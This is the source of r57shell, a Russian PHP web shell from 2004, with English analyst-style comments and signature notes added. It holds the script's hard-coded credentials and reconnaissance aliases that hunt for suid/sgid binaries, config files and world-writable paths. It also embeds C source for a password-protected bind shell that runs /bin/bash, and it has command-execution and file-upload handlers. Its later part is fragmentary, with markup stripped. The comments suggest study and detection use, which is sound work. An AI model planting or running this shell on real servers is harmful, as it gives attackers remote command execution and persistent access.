\___|_ / /* -======\/==security=\/=team==\/ /* /* SPECIAL xbIx birthday edition /* /* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер /* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru или www.rsteam.ru /* Версия 1.0 beta (писалась практически на коленке... так что код сыроват... для тестирования) /* /* Возможности: /* ~ защита скрипта с помощью пароля /* ~ выполнение шелл-команд /* ~ загрузка файлов на сервер /* ~ поддерживает алиасы команд /* ~ включены 4 алиаса команд: /* - поиск на сервере всех файлов с suid битом /* - поиск на сервере всех файлов с sgid битом /* - поиск на сервере файлов config.inc.php /* - поиск на сервере всех директорий и файлов доступных на запись для всех /* ~ два языка интерфейса: русский, английский /* ~ возможность забиндить /bin/bash на определенный порт /* /* 05.03.2004 (c) RusH security team /* /******************************************************************************************************/ ## Аутентификация ## Логин и пароль для доступа к скрипту ## НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!! 
## Access gate and interface strings of the web shell described in the header.
## For an analyst: this block holds the script's hard-coded HTTP Basic credentials,
## the realm string it sends in its 401 challenge, and the UI text table.
## The literal strings on this page (realm "r57shell", the "r57"/"r57" pair) are
## usable as content signatures when scanning web roots or HTTP responses;
## the header comment tells the operator to change the credentials, so the realm
## string is presumably the more stable of the two — verify against other samples.
$name="r57"; ## user login
$pass="r57"; ## user password
## $PHP_AUTH_USER / $PHP_AUTH_PW are read as bare variables; nothing in this block
## assigns them or reads $_SERVER. NOTE(review): presumably relies on the runtime
## exporting request variables as globals (register_globals-era PHP) — confirm.
## Where they are not populated, the first branch always answers 401 and exits.
if(!isset($PHP_AUTH_USER))
 {
 ## No credentials supplied: send the Basic challenge and stop.
 Header('WWW-Authenticate: Basic realm="r57shell"');
 Header('HTTP/1.0 401 Unauthorized');
 exit;
 }
else
 {
 ## Credentials supplied: either field differing from the hard-coded pair
 ## gets the same challenge again.
 if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass))
  {
  Header('WWW-Authenticate: Basic realm="r57shell"');
  Header('HTTP/1.0 401 Unauthorized');
  exit;
  }
 }
## Error reporting is switched off and the execution time limit removed, so
## failures produce no PHP error output and long-running requests are not cut
## short by the time limit.
error_reporting(0);
set_time_limit(0);
/*
 Language choice
 $language='ru' - Russian
 $language='eng' - English
*/
$language='ru';
## UI text table. Keys are "<language>_<id>"; later lines of the page index it as
## $lang[$language._textN].
## NOTE(review): the 'ru_*' values look like Windows-1251 text rendered in the
## wrong charset on this page — confirm against the raw bytes of the sample.
## They are runtime strings and are left exactly as shown.
$lang=array(
 'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
 'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
 'ru_text3' => 'Âûïîëíèòü êîìàíäó',
 'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
 'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
 'ru_text6' => 'Ëîêàëüíûé ôàéë',
 'ru_text7' => 'Àëèàñû',
 'ru_text8' => 'Âûáåðèòå àëèàñ',
 'ru_butt1' => 'Âûïîëíèòü',
 'ru_butt2' => 'Çàãðóçèòü',
 'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
 'ru_text10' => 'Îòêðûòü ïîðò',
 'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
 'ru_butt3' => 'Îòêðûòü',
 'eng_text1' => 'Executed command',
 'eng_text2' => 'Execute command on server',
 'eng_text3' => ' Run command',
 'eng_text4' => 'Work directory',
 'eng_text5' => 'Upload files on server',
 'eng_text6' => 'Local file',
 'eng_text7' => 'Aliases',
 'eng_text8' => 'Select alias',
 'eng_butt1' => 'Execute',
 'eng_butt2' => 'Upload',
 'eng_text9' => 'Bind port to /bin/bash',
 'eng_text10' => 'Port',
 'eng_text11' => 'Password for access',
 'eng_butt3' => 'Bind'
 );
/*
 Command aliases
 They save retyping the same commands over and over.
 ( Made thanks to my natural laziness )
 You can add or change the commands yourself.
*/ $aliases=array( /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ 'find all suid files' => 'find / -type f -perm -04000 -ls', /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ 'find all sgid files' => 'find / -type f -perm -02000 -ls', /* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ 'find config.inc.php files' => 'find / -type f -name config.inc.php', /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ 'find writable directories and files' => 'find / -perm -2 -ls', '----------------------------------------------------------------------------------------------------' => 'ls -la' ); /* Port bind source */ $port_bind_bd_c=" #include #include #include #include #include #include int main(argc,argv) int argc; char **argv; { int sockfd, newfd; char buf[30]; struct sockaddr_in remote; if(argc < 3) usage(argv[0]); if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ remote.sin_family = AF_INET; remote.sin_port = htons(atoi(argv[1])); remote.sin_addr.s_addr = htonl(INADDR_ANY); sockfd = socket(AF_INET,SOCK_STREAM,0); if(!sockfd) perror(\"socket error\"); bind(sockfd, (struct sockaddr *)&remote, 0x10); listen(sockfd, 5); while(1) { newfd=accept(sockfd,0,0); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2); write(newfd,\"Password:\",10); read(newfd,buf,sizeof(buf)); if (!chpass(argv[2],buf)) system(\"echo welcome to r57 shell && /bin/bash -i\"); else fprintf(stderr,\"Sorry\"); close(newfd); } } } int usage(char *progname) { fprintf(stderr,\"USAGE:%s \n\",progname); exit(0); } int chpass(char *base, char *entered) { int i; for(i=0;i r57shell
   !  r57shell
"; echo "uname -a : 
id : 
pwd : 

"; echo "
"; echo ""; echo "    ".exec("uname -a")."
"; echo "    ".exec("id")."
"; echo "    ".exec("pwd").""; echo "
"; echo ""; ?>
$alias_cmd) { if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} } } ?>
Error uploading file ".$HTTP_POST_FILES["userfile"][name]."
"); } ?>
".$lang[$language._text1].": ".$_POST['cmd']."
"; echo ""; echo "
"; echo "
"; ?>
:: ::
"; echo ""; echo " ".$lang[$language._text3]." è    "; echo "  
"; echo " ".$lang[$language._text4]." è    "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo "  "; echo "
"; echo ""; ?>
:: ::
"; echo ""; echo "       ".$lang[$language._text6]." è    "; echo " "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo ""; echo ""; ?>
:: ::
"; echo ""; echo "         ".$lang[$language._text8]." è    "; echo ""; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo "  "; echo ""; echo ""; ?>
:: ::
"; echo ""; echo "              ".$lang[$language._text10]." è    "; echo " "; echo "      ".$lang[$language._text11]." è    "; echo " "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo "      "; echo ""; echo ""; ?>
o---[ r57shell - http-shell by RusH security team | http://rst.void.ru | version 1.0 beta ]---o"; ?>